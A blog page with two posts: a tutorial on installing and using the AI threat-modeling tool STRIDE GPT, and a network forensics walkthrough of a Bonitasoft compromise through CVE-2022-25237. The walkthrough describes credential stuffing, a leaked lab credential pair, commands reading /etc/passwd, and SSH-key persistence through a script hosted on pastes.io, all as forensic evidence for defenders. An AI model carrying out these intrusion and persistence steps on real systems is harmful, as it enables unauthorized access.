Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi> python3 –version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt –break-system-packages

This installation process may take a few minutes.

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Lightning Processing Units, which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server.

Once you copy the URL into your browser, you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure as the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #8: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling easier for everyone by using AI to automate the analysis while keeping the quality of the proven STRIDE method.

In this article, we checked out STRIDE GPT and went over its main features. No matter if you’re protecting a basic web app or a complicated microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Network Forensics: Analyzing a Server Compromise (CVE-2022-25237)

24 October 2025 at 10:34

Welcome back, aspiring forensic and incident response investigators.

Today we are going to learn more about a branch of digital forensics that focuses on networks, which is Network Forensics. This field often contains a wealth of valuable evidence. Even though skilled attackers may evade endpoint controls, active network captures are harder to hide. Many of the attacker’s actions generate traffic that is recorded. Intrusion detection and prevention systems (IDS/IPS) can also surface malicious activity quickly, although not every organization deploys them. In this exercise you will see what can be extracted from IDS/IPS logs and a packet capture during a network forensic analysis.

The incident we will investigate today involved a credential-stuffing attempt followed by exploitation of CVE-2022-25237. The attacker abused an API to run commands and establish persistence. Below are the details and later a timeline of the attack.

Intro

Our subject is a fast-growing startup that uses a business management platform. Documentation for that platform is limited, and the startup administrators have not followed strong security practices. For this exercise we act as the security team. Our objective is to confirm the compromise using network packet captures (PCAP) and exported security logs.

We obtained an archive containing the artifacts needed for the investigation. It includes a .pcap network traffic file and a .json file with security events. Wireshark will be our primary analysis tool.

network artifacts for the analysis

Analysis

Defining Key IP Addresses

The company suspects its management platform was breached. To identify which platform and which hosts are involved, we start with the pcap file. In Wireshark, view the TCP endpoints from the Statistics menu and sort by packet count to see which IP addresses dominate the capture.

endpoints in wireshark with higher reception

This quickly highlights the IP address 172.31.6.44 as a major recipient of traffic. The traffic to that host uses ports 37022, 8080, 61254, 61255, and 22. Common service associations for these ports are: 8080 for HTTP, 22 for SSH, and 37022 as an arbitrary TCP data port that the environment is using.

When you identify heavy talkers in a capture, export their connection lists and timestamps immediately. That gives you a focused subset to work from and preserves the context of later findings.

Analyzing HTTP Traffic

The port usage suggests the management platform is web-based. Filter HTTP traffic in Wireshark with http.request to inspect client requests. The first notable entry is a GET request whose URL and headers match Bonitasoft’s platform, showing the company uses Bonitasoft for business management.

http traffic that look like brute force

Below that GET request you can see a series of authentication attempts (POST requests) originating from 156.146.62.213. The login attempts include usernames that reveal the attacker has done corporate OSINT and enumerated staff names.

The credentials used for the attack are not generic wordlist guesses, instead the attacker tries a focused set of credentials. That behavior is consistent with credential stuffing: the attacker uses previously leaked username/password pairs (often from other breaches) and tries them against this service, typically automated and sometimes distributed via a botnet to blend with normal traffic.

credentil stuffing spotted

A credential-stuffing event alone does not prove a successful compromise. The next step is to check whether any of the login attempts produced a successful authentication. Before doing that, we review the IDS/IPS alerts.

Finding the CVE

To inspect the JSON alert file in a shell environment, format it with jq and then see what’s inside. Here is how you can make the json output easier to read:

bash$ > cat alerts.json | jq .

reading alert log file

Obviously, the file will be too big, so we will narrow it down to indicators such as CVE:

bash$ > cat alerts.json | jq .

grepping cves in the alert log file

Security tools often map detected signatures to known CVE identifiers. In our case, alert data and correlation with the observed HTTP requests point to repeated attempts to exploit CVE-2022-25237, a vulnerability affecting Bonita Web 2021.2. The exploit abuses insufficient validation in the RestAPIAuthorizationFilter (or related i18n translation logic). By appending crafted data to a URL, an attacker can reach privileged API endpoints, potentially enabling remote code execution or privilege escalation.

cve 2022-25237 information

Now we verify whether exploitation actually succeeded.

Exploitation

To find successful authentications, filter responses with:

http.response.code >= 200 and http.response.code < 300 and ip.addr == 172.31.6.44

filtering http responses with successful authentication

Among the successful responses, HTTP 204 entries stand out because they are less common than HTTP 200. If we follow the HTTP stream for a 204 response, the request stream shows valid credentials followed immediately by a 204 response and cookie assignment. That means he successfully logged in. This is the point where the attacker moves from probing to interacting with privileged endpoints.

finding a successful authentication

After authenticating, the attacker targets the API to exploit the vulnerability. In the traffic we can see an upload of rce_api_extension.zip, which enables remote code execution. Later this zip file will be deleted to remove unnecessary traces.

finding the api abuse after the authentication
attacker uploaded a zip file to abuse the api

Following the upload, we can observe commands executed on the server. The attacker reads /etc/passwd and runs whoami. In the output we see access to sensitive system information.

reading the passwd file
the attacker assessing his privileges

During a forensic investigation you should extract the uploaded files from the capture or request the original file from the source system (if available). Analyzing the uploaded code is essential to understand the artifact of compromise and to find indicators of lateral movement or backdoors

Persistence

After initial control, attackers typically establish persistence. In this incident, all attacker activity is over HTTP, so we follow subsequent HTTP requests to find persistence mechanisms.

the attacker establishes persistence with pastes.io

The attacker downloads a script hosted on a paste service (pastes.io), named bx6gcr0et8, which then retrieves another snippet hffgra4unv, appending its output to /home/ubuntu/.ssh/authorized_keys when executed. The attacker restarts SSH to apply the new key.

reading the bash script used to establish persistence

A few lines below we can see that the first script was executed via bash, completing the persistence setup.

the persistence script is executed

Appending keys to authorized_keys allows SSH access for the attacker’s key pair and doesn’t require a password. It’s a stealthy persistence technique that avoids adding new files that antivirus might flag. In this case the attacker relied on built-in Linux mechanisms rather than installing malware.

When you find modifications to authorized_keys, pull the exact key material from the capture and compare it with known attacker keys or with subsequent SSH connection fingerprints. That helps attribute later logins to this initial persistence action.

Mittre SSH Authorized Keys information

Post-Exploitation

Further examination of the pcap shows the server reaching out to Ubuntu repositories to download a .deb package that contains Nmap. 

attacker downloads a deb file with nmap
attacker downloads a deb file with nmap

Shortly after SSH access is obtained, we see traffic from a second IP address, 95.181.232.30, connecting over port 22. Correlating timestamps shows the command to download the .deb package was issued from that SSH session. Once Nmap is present, the attacker performs a port scan of 34.207.150.13.

attacker performs nmap scan

This sequence, adding an SSH key, then using SSH to install reconnaissance tools and scan other hosts fits a common post-exploitation pattern. Hackers establish persistent access, stage tools, and then enumerate the network for lateral movement opportunities.

During forensic investigations, save the sequence of timestamps that link file downloads, package installation, and scanning activity. Those correlations are important for incident timelines and for identifying which sessions performed which actions.

Timeline

At the start, the attacker attempted credential stuffing against the management server. Successful login occurred with the credentials seb.broom / g0vernm3nt. After authentication, the attacker exploited CVE-2022-25237 in Bonita Web 2021.2 to reach privileged API endpoints and uploaded rce_api_extension.zip. They then executed commands such as whoami and cat /etc/passwd to confirm privileges and enumerate users.

The attacker removed rce_api_extension.zip from the web server to reduce obvious traces. Using pastes.io from IP 138.199.59.221, the attacker executed a bash script that appended data to /home/ubuntu/.ssh/authorized_keys, enabling SSH persistence (MITRE ATT&CK: SSH Authorized Keys, T1098.004). Shortly after persistence was established, an SSH connection from 95.181.232.30 issued commands to download a .deb package containing Nmap. The attacker used Nmap to scan 34.207.150.13 and then terminated the SSH session.

Conclusion

During our network forensics exercise we saw how packet captures and IDS/IPS logs can reveal the flow of a compromise, from credential stuffing, through exploitation of a web-application vulnerability, to command execution and persistence via SSH keys. We practiced using Wireshark to trace HTTP streams, observed credential stuffing in action, and followed the attacker’s persistence mechanism.

Although our class focused on analysis, in real incidents you should always preserve originals and record every artifact with exact timestamps. Create cryptographic hashes of artifacts, maintain a chain of custody, and work only on copies. These steps protect the integrity of evidence and are essential if the incident leads to legal action.

For those of you interested in deepening your digital forensics skills, we will be running a practical SCADA forensics course soon in November. This intensive, hands-on course teaches forensic techniques specific to Industrial Control Systems and SCADA environments showing you how to collect and preserve evidence from PLCs, RTUs, HMIs and engineering workstations, reconstruct attack chains, and identify indicators of compromise in OT networks. Its focus on real-world labs and breach simulations will make your CV stand out. Practical OT/SCADA skills are rare and highly valued, so completing a course like this is definitely going to make your CV stand out. 

We also offer digital forensics services for organizations and individuals. Contact us to discuss your case and which services suit your needs.

Learn more: https://hackersarise.thinkific.com/courses/scada-forensics

The post Network Forensics: Analyzing a Server Compromise (CVE-2022-25237) first appeared on Hackers Arise.

❌
❌